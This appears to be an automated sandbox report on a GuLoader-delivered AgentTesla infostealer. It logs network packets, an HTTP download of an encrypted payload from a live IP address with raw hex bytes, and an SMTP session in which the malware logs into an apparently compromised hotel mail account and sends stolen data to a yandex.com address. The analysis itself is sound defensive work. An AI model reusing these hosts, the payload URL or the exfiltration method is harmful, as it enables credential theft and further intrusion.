                                                                                  May 27, 2022 19:41:07.359164000 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359178066 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359205008 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359213114 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.359220028 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359236002 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359261990 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359277010 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359302044 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359317064 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359330893 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359357119 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359371901 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359384060 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.359386921 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359407902 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359421968 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359432936 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.359436035 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359463930 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359478951 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359493017 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359517097 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359530926 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359543085 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359556913 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359564066 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.359571934 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359586954 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359601974 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359616995 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359725952 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.359824896 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:12.783258915 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:12.783565998 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:42:44.001442909 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:44.064162016 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.064455986 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:44.306915045 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.307287931 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:44.369997025 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.373267889 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:44.436863899 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.437421083 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:44.539477110 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.567787886 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.568514109 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:44.630757093 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.630826950 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.631124020 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:44.733349085 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.799923897 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.800266981 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:44.862549067 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.862984896 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.865082026 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:44.865134954 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:44.865148067 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:44.865156889 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:44.927443981 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:44.947788954 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:46.252098083 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:42:46.307791948 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:42:57.211761951 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:42:57.524077892 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:42:58.133433104 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:42:59.336241007 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:43:01.741945982 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:43:06.553397894 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:43:16.160815001 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:44:23.833553076 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:44:23.935385942 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:44:24.099668980 CEST5874976345.10.148.33192.168.11.20
                                                                                  May 27, 2022 19:44:24.100042105 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:44:24.100123882 CEST49763587192.168.11.2045.10.148.33
                                                                                  May 27, 2022 19:44:24.162296057 CEST5874976345.10.148.33192.168.11.20

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 27, 2022 19:42:43.874780893 CEST6030353192.168.11.201.1.1.1
                                                                                  May 27, 2022 19:42:43.993166924 CEST53603031.1.1.1192.168.11.20

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  May 27, 2022 19:42:43.874780893 CEST192.168.11.201.1.1.10x53c3Standard query (0)mail.parkhotelizmir.comA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  May 27, 2022 19:42:43.993166924 CEST1.1.1.1192.168.11.200x53c3No error (0)mail.parkhotelizmir.com45.10.148.33A (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • 185.222.57.79

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.11.2049754185.222.57.7980C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 27, 2022 19:41:07.264504910 CEST8628OUTGET /SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: 185.222.57.79
                                                                                  Cache-Control: no-cache
                                                                                  May 27, 2022 19:41:07.278637886 CEST8629INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 May 2022 17:41:06 GMT
                                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                                                                  Last-Modified: Fri, 27 May 2022 10:16:01 GMT
                                                                                  ETag: "36240-5dffb97debf87"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 221760
                                                                                  Content-Type: application/octet-stream
                                                                                  Data Raw: 2d 69 12 93 de 1a 67 e3 7f ae 04 59 ab af ba b8 06 e1 f6 84 da df 3f 2c 16 02 e8 fc a1 c5 39 87 74 e4 ac af 6a 34 a1 e7 b9 d0 4e a1 e7 84 37 d8 ba 27 e1 81 24 67 b7 26 f4 ba 09 0b af 53 6f f8 f2 67 73 50 49 f3 53 fe 8f ec 26 3c 10 58 b5 71 06 a5 a9 38 35 69 c2 0b 32 79 72 74 ac 4c 1e 85 2d cf 2a 1f ac c6 91 e2 4f 84 a7 79 16 00 f6 80 f0 94 53 3e df 03 29 1a e2 0b 43 48 21 e2 18 fb 71 8a 60 18 cf 97 da 5e 1d db 64 6a b6 b8 bf 51 02 36 76 b5 5c 74 da 61 c6 32 f5 29 62 45 50 b5 1f 15 ba c0 8c 4e 65 1b 40 bb fd 0c 09 05 99 ff 30 58 62 16 c0 38 8d 8b d3 da 43 f9 da 0b 0d 32 a6 f0 3b 6c 73 91 b2 1c b3 2d be 2b 0b 90 3a 5d 3d 77 6e f5 86 29 1a 35 17 da 9e 44 81 0a 47 b7 05 4f 5c de c5 99 00 a6 56 1b 7a 63 47 b0 49 ac 96 7d c6 3a 6d fd 67 e9 1a e8 2d 5c 2c 1c 8a 27 b7 4b 21 ca e0 e3 e6 13 f5 6e 0d 51 0b 88 4c 18 8b 84 1c 19 d0 cb f5 dd a7 2a a5 40 64 98 19 9b 84 99 01 8b 7d 33 19 23 48 ea bd 8c f8 be 87 18 9e 9c 52 28 6b 51 f4 8c f4 07 4b 59 58 b3 c4 4d 87 0b 74 70 d1 ff f1 a8 b6 c1 41 c7 26 e1 e7 d9 2a 7e fc 57 9e a6 15 41 49 0d 3e 51 9d 7e 51 ee 48 78 cf a5 65 3a 00 7e d4 d7 a0 f1 8e 43 01 47 0f c8 ac bd 56 7c 94 a0 0c 74 5f ca af 9d 40 47 fd 34 33 5f f9 e0 19 e0 9c 2c ee 1d 06 94 ec 6a 09 99 4a 27 cb 4a 0a 24 90 44 b1 8e dd 9c 8e 93 c4 c4 ca 42 e0 a8 bc f7 80 62 0c c7 e5 b9 1c 2e 7b 04 36 b9 17 9b de 6c fa 1e 8c fd fc 06 c4 f2 60 f6 80 2d 28 8a 38 e4 3c 64 ff b6 5d 3e 03 4b 93 57 9f 6e 1d e3 a7 d6 cd 7f f3 cd 0b 8f 63 e5 eb 23 40 41 1b d1 60 20 33 a1 32 b3 1f fc 4a 86 a1 b7 a1 9a 7d ab f2 bd c6 9e 2c 4d 29 f5 c7 b9 53 93 da 3f d9 09 d6 c3 0d 8a 4d e3 7d a2 6b 47 5d 0b 0c d4 20 87 c6 2c cb 60 89 f5 d9 00 ae 21 f3 7a 1f 53 5f 65 7c 29 fd 5e f1 a1 1b 16 f0 81 86 cb 6f 35 bd 09 ba 13 a8 2e 94 d7 1a 90 05 b0 28 bc c3 13 10 d1 cb 57 fc 2e 16 45 ab 12 c7 35 aa e2 d0 2d 65 c0 f6 d3 ac 36 55 1d 19 69 2b 4f 6d 34 0a c5 5f 3d e0 1d 46 45 f4 0e 77 1d cf b6 68 91 06 f1 78 01 d4 80 a6 f3 78 81 c7 50 f6 27 1c 23 ad 9b 58 93 1c 18 e7 ca 26 fb c1 36 fb 6e e2 5b ee e9 69 bb 0c 46 42 e5 db b3 ff 53 41 3e d7 30 98 21 08 de cb 88 56 c8 3b cc 8c 6a 3a 9d 89 99 6d 3d 40 76 9e 32 00 f4 1a 46 a0 61 2c 5c 88 69 3e 6c 00 90 ef 36 ef c3 69 d6 15 14 5f c3 d7 df 99 37 3e 13 48 35 5d e4 67 88 96 20 9f 85 20 95 4c 40 ed 81 be cb 71 71 ea ee 34 0b 12 0c 22 2a 3c b0 2c bb df 95 18 9d db 23 20 25 78 b3 9c 65 dd 51 84 0b 35 80 ea e0 17 da 67 2e 5a 38 8f 85 1b 05 0c dc 52 7f 03 07 bd c8 75 18 20 3d 5a a8 d3 b6 47 4e c5 51 ed dc ef 15 32 37 4f 24 b7 4f a2 00 46 d8 20 ff 1b 3c 80 0d 53 97 a9 c9 f5 47 6d a7 5a 3a d8 1a ae ab 12 f9 1f c9 b5 61 05 ba 59 78 6e a0 ba f3 6d ff 5e cb 36 37 10 34 5a 82 8c 5e 30 c2 d7 7e ba d5 cb dd fd 53 77 c0 af 46 61 60 57 ea 04 e7 17 23 5d 83 11 91 00 e1 e8 69 67 79 46 c9 d5 24 89 37 f6 84 a6 18 11 7a db bc 8e 8c 88 8e 38 61 c1 83 ad f6 4c 3f 9d 94 de 9d 54 4a f3 57 91 86 ec 26 36 c5 b4 85 73 be 8b a9 38 35 6c c2 0b 63 6f 79 5f b7 4c 19 92 d3 ce 06 1d b4 cd 91 e5 59 7a a6 55 14 17 fd 80 f7 8c ad 3f f3 01 02 18 c9 e8 41 4b 89 f3 18 fb 75 bd c8 16 cf 29 f9 93 3c 70 55 24 7b b1 eb 39 6b 43 56 c5 3f 0d b6 38 bc 5f d2 5d fd 2a 12 d8 73 3e d8 a2 ba c2 11 59 62 c5 98 2c 4a 52 34 de 71 35 2d 71 c5 d6 82 a9 e4 da 43 f3 f0 18 3d 30 f6 99 3b 6c 3f 97 b1 1c 5e
                                                                                  Data Ascii: -igY?,9tj4N7'$g&SogsPIS&<Xq85i2yrtL-*OyS>)CH!q`^djQ6v\ta2)bEPNe@0Xb8C2;ls-+:]=wn)5DGO\VzcGI}:mg-\,'K!nQL*@d}3#HR(kQKYXMtpA&*~WAI>Q~QHxe:~CGV|t_@G43_,jJ'J$DBb.{6l`-(8<d]>KWnc#@A` 32J},M)S?M}kG] ,`!zS_e|)^o5.(W.E5-e6Ui+Om4_=FEwhxxP'#X&6n[iFBSA>0!V;j:m=@v2Fa,\i>l6i_7>H5]g L@qq4"*<,# %xeQ5g.Z8Ru =ZGNQ27O$OF <SGmZ:aYxnm^674Z^0~SwFa`W#]igyF$7z8aL?TJW&6s85lcoy_LYzU?AKu)<pU${9kCV?8_]*s>Yb,JR4q5-qC=0;l?^
                                                                                  May 27, 2022 19:41:07.278716087 CEST8630INData Raw: d3 5c 61 10 90 3d 4a c3 76 42 f7 7e 22 18 33 0a 25 94 68 83 45 4f b7 02 5f a2 df e9 9b 2b a4 13 8e a9 66 47 90 4b 84 82 7d c6 30 47 ee 17 eb 1a e0 2d 5c 2c 16 8a 27 a2 5d 2a e1 fb e3 e1 04 0f 6f 21 53 13 83 4c 1f 9d ba 1e 35 d2 de fe dd a0 32 5b
                                                                                  Data Ascii: \a=JvB~"3%hEO_+fGK}0G-\,']*o!SL52[AJrzh#)bR(jGLNOvwwiCf!~O`9KK;Qe|QRYF#}go@G>3_b9J<TdBT6il
                                                                                  May 27, 2022 19:41:07.278772116 CEST8632INData Raw: 28 24 44 89 56 e0 1f bf 8b 60 12 7f 08 9b 6b bd 50 05 96 36 28 df 9a 45 aa 0e 0a 2f 81 63 be 75 80 94 eb 1e a8 eb 69 d0 2e 07 5d c3 f1 f7 dd 35 3f 15 60 00 4b ef 46 13 99 27 88 7f 09 9c 4e 58 ec a9 fc df 8f 76 ee ca 23 00 18 23 1d d4 3d 96 ae 87
                                                                                  Data Ascii: ($DV`kP6(E/cui.]5?`KF'NXv##=# +];1Z)'q'E~'gyPEP9:G|)@1<Tm]D/1aet<9j:r4UYWn(HD.;#WSFLbLhc
                                                                                  May 27, 2022 19:41:07.278786898 CEST8633INData Raw: 97 9c 00 8e 77 fd 29 2a 64 ec a4 e3 af ae 87 12 42 42 58 20 57 57 fc e3 a3 07 4b 53 84 9b ea 4f 93 7b 7d ae 94 d7 c6 a8 b6 4b 6a e9 64 e4 e1 d3 02 46 fc 57 94 78 15 47 63 0d 3e 51 9c 56 51 ee 4a d8 b5 a5 7f b5 00 74 d4 d7 a0 f1 8c 43 58 47 4d 53
                                                                                  Data Ascii: w)*dBBX WWKSO{}KjdFWxGc>QVQJtCXGMSV|t_0@U43^-{'@~d-@[J6xllBg8:]:lWh5+eQ39ss3L|I{&[i~Sk$pP'
                                                                                  May 27, 2022 19:41:07.292305946 CEST8635INData Raw: 2e 29 37 3f ef 9e 65 d1 d9 9e 2c 49 97 c6 e0 13 f2 20 2c 5a 2f b1 d9 32 1e 0a b4 3d 81 02 21 1d d9 66 30 7f 29 a4 af 5d bd 49 6d bc 56 f5 28 e2 2b 32 62 5b 0f 54 35 88 7a 46 dc 45 56 12 26 a2 7e 42 a7 ad 6b d0 6f 16 a7 59 30 f0 24 b8 a0 3f 3c 73
                                                                                  Data Ascii: .)7?e,I ,Z/2=!f0)]ImV(+2b[T5zFEV&~BkoY0$?<ssXe;|!8{e2})JD.9#[lpNJa0On%2Nf=;HU&:1FiytL(wsZ)lH9#<c&{
                                                                                  May 27, 2022 19:41:07.292381048 CEST8636INData Raw: a6 24 23 5d ca a9 f2 38 47 fd 3e 91 4e fc f8 31 b8 9e 2c e8 bf 17 91 f5 42 70 99 4a 2d d8 4e 18 20 ee 72 b1 8e d1 b4 f4 93 c4 ce 68 53 e5 b2 94 91 8a 42 0a 65 bc bc 34 55 7b 04 3c 91 70 99 de 6a fc 42 e9 85 8e 01 ec 67 14 a0 89 05 40 a8 38 e2 14
                                                                                  Data Ascii: $#]8G>N1,BpJ-N rhSBe4U{<pjBg@8@W-KQF$+pT%`&7akI}*"Q'Q%Z9GQ2#:b`+QkIw~)sm7;.2~y.}u5c-1?6U(X+Ig`=nm
                                                                                  May 27, 2022 19:41:07.292438030 CEST8637INData Raw: c0 60 65 aa 95 9d 91 fe 74 e1 ba 3c 10 39 6a 78 8d 72 34 86 4f 55 59 a1 a7 bc fd 57 12 e4 34 46 6b 40 5b d0 8a b8 3b 23 5c ab 8e 91 00 fa d6 10 4e 62 40 e6 59 da 88 11 e3 b4 8d 18 16 6a 0d 26 a2 8e 95 9a 32 ea 86 7d ac db 66 8f 9f bf 37 cb 23 48
                                                                                  Data Ascii: `et<9jxr4OUYW4Fk@[;#\Nb@Yj&2}f7#HU&6q5ix-tM6- 70e{RS>"1D__4g>tn&|8GG}J*Ak5<HI,Gb]1.5C2l?OgH:]=wnf>0lRD#P
                                                                                  May 27, 2022 19:41:07.292453051 CEST8639INData Raw: 03 4b 99 7f 2d 6e 1d e9 8f 65 cd 7f f9 f7 5c 70 9c 7a da 5b 20 38 78 c0 6b 39 8d a5 1e bc 1d 13 fd 86 a1 bb 2d a5 7d f1 f0 b7 dc 8d 27 4d 38 fe d9 47 52 bf d4 2e 91 1f 4c ab 32 f8 28 85 1f de 62 54 5a 0b 1d df 3f 2a 3b 2d e7 7f 8b e4 dd 48 f7 21
                                                                                  Data Ascii: K-ne\pz[ 8xk9-}'M8GR.L2(bTZ?*;-H!pUw?|)1][ve*%)D.N<4Bq+|'P5i+CE0tRUFOdcy-~Q/+h7UnSfOXKz\ZADk/g7[9S^`,
                                                                                  May 27, 2022 19:41:07.292480946 CEST8640INData Raw: 2c e2 e0 82 9d 46 be a5 a3 2b 25 41 fa 0b 72 73 ac 74 bd 44 36 56 2d cf 2c 70 6a c6 91 e8 91 8b 82 51 21 00 f6 8a e3 85 7b 06 df 03 23 c4 e2 1a 4b 60 42 e2 18 fd 10 53 da 16 c5 fd dc b6 14 54 65 26 71 8a f9 11 53 45 56 cf f0 1b ac 1b 8f 88 d5 4a
                                                                                  Data Ascii: ,F+%ArstD6V-,pjQ!{#K`BSTe&qSEVJDk?'u`?erWb,?l?$O]2uwn4aeDTHmhkoPI:m?\,2s!=FQ#D*Spal+1H>@wLQcaX
                                                                                  May 27, 2022 19:41:07.292500973 CEST8641INData Raw: 63 13 ef fd 5e fb 7f 54 33 d8 f4 86 cb 65 26 92 21 82 13 a8 24 4a d7 0b 98 2d 55 78 ca c6 7c d6 d1 cb 5d 6a 21 33 6d 9e 12 c2 3f 7d 5d fa 15 35 26 fc 0d af 27 5d 35 d1 69 2b 4f 02 f2 0a c5 55 e3 ef 38 6e 72 f4 0e 7d 0e fe 9e 50 91 06 fb a6 01 c5
                                                                                  Data Ascii: c^T3e&!$J-Ux|]j!3m?}]5&']5i+OU8nr}P?x?0')s}+5nal\qSA~fAe`ED]O~ni>lc5U=1PH$A1C{+{pQp<.# +]{7e(5:m
                                                                                  May 27, 2022 19:41:07.292515993 CEST8643INData Raw: 35 d8 33 af 3c 10 79 60 d2 93 36 4d 4a cb df 5d 37 06 d1 ed 35 80 92 f7 da 43 4c d9 0b 0d 3d f6 b5 3b 76 3f 90 b0 1c 4f c5 57 8e 08 90 3a 53 3d 77 6e 27 65 29 18 3b 1c db 95 5e 81 52 45 b7 05 47 5c 3f c6 99 00 a8 38 6d 79 8c 44 90 49 a3 96 7d c6
                                                                                  Data Ascii: 53<y`6MJ]75CL=;v?OW:S=wn'e);^REG\?8myDI} m&-/)K!nKMD*ibY}##HRnQKCXM}w%ABb*~MAI>#~QH%m:qCG2R|t_W@K43E,dJ


                                                                                  SMTP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                  May 27, 2022 19:42:44.306915045 CEST5874976345.10.148.33192.168.11.20220-artemis.egegen.com ESMTP Exim 4.95 #2 Fri, 27 May 2022 20:42:44 +0300
                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                  220 and/or bulk e-mail.
                                                                                  May 27, 2022 19:42:44.307287931 CEST49763587192.168.11.2045.10.148.33EHLO 965969
                                                                                  May 27, 2022 19:42:44.369997025 CEST5874976345.10.148.33192.168.11.20250-artemis.egegen.com Hello 965969 [84.17.52.2]
                                                                                  250-SIZE 52428800
                                                                                  250-8BITMIME
                                                                                  250-PIPELINING
                                                                                  250-PIPE_CONNECT
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-STARTTLS
                                                                                  250-SMTPUTF8
                                                                                  250 HELP
                                                                                  May 27, 2022 19:42:44.373267889 CEST49763587192.168.11.2045.10.148.33AUTH login bXVoYXNlYmVAcGFya2hvdGVsaXptaXIuY29t
                                                                                  May 27, 2022 19:42:44.436863899 CEST5874976345.10.148.33192.168.11.20334 UGFzc3dvcmQ6
                                                                                  May 27, 2022 19:42:44.567787886 CEST5874976345.10.148.33192.168.11.20235 Authentication succeeded
                                                                                  May 27, 2022 19:42:44.568514109 CEST49763587192.168.11.2045.10.148.33MAIL FROM:<muhasebe@parkhotelizmir.com>
                                                                                  May 27, 2022 19:42:44.630826950 CEST5874976345.10.148.33192.168.11.20250 OK
                                                                                  May 27, 2022 19:42:44.631124020 CEST49763587192.168.11.2045.10.148.33RCPT TO:<saleseuropower2@yandex.com>
                                                                                  May 27, 2022 19:42:44.799923897 CEST5874976345.10.148.33192.168.11.20250 Accepted
                                                                                  May 27, 2022 19:42:44.800266981 CEST49763587192.168.11.2045.10.148.33DATA
                                                                                  May 27, 2022 19:42:44.862984896 CEST5874976345.10.148.33192.168.11.20354 Enter message, ending with "." on a line by itself
                                                                                  May 27, 2022 19:42:44.865156889 CEST49763587192.168.11.2045.10.148.33.
                                                                                  May 27, 2022 19:42:46.252098083 CEST5874976345.10.148.33192.168.11.20250 OK id=1nudz3-0003gS-BW
                                                                                  May 27, 2022 19:44:23.833553076 CEST49763587192.168.11.2045.10.148.33QUIT
                                                                                  May 27, 2022 19:44:24.099668980 CEST5874976345.10.148.33192.168.11.20221 artemis.egegen.com closing connection

                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:19:40:39
                                                                                  Start date:27/05/2022
                                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:658225 bytes
                                                                                  MD5 hash:DD43BD8CDC55DD9C8A168F7D5E67DB30
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:19:40:51
                                                                                  Start date:27/05/2022
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
                                                                                  Imagebase:0x260000
                                                                                  File size:108664 bytes
                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:19:40:52
                                                                                  Start date:27/05/2022
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
                                                                                  Imagebase:0x600000
                                                                                  File size:108664 bytes
                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:19:40:52
                                                                                  Start date:27/05/2022
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
                                                                                  Imagebase:0xcb0000
                                                                                  File size:108664 bytes
                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.19759760809.000000001D7ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.14824947099.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:19:40:52
                                                                                  Start date:27/05/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff78a640000
                                                                                  File size:875008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:8.9%
                                                                                    Dynamic/Decrypted Code Coverage:15.3%
                                                                                    Signature Coverage:19.8%
                                                                                    Total number of Nodes:1909
                                                                                    Total number of Limit Nodes:56
